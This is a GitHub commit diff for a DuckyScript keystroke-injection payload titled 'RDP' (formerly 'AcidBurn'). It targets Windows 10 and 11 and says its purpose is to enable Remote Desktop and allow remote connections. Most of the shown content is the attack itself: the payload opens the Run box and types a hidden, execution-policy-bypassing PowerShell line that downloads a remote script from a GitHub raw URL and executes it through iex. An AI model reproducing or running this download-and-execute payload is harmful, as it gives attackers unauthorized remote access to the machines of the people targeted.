Update activateRDP.txt

This commit is contained in:
Jonas 2022-12-30 01:20:55 +01:00 committed by GitHub
parent 10440aae89
commit 4046b1795a
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1,8 +1,8 @@
REM Title: AcidBurn
REM Title: RDP
REM Author: UNC0V3R3D
REM Description: This payload is going to activate remote desktop.
REM Description: This payload is going to activate remote desktop and allow remote connections.
REM Target: Windows 10, 11
@ -13,4 +13,4 @@ REM ------------------------------------------------------------------------
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass iwr https://raw.githubusercontent.com/UNC0V3R3D/ressources/main/rdpscript.ps1 | iex
ENTER
ENTER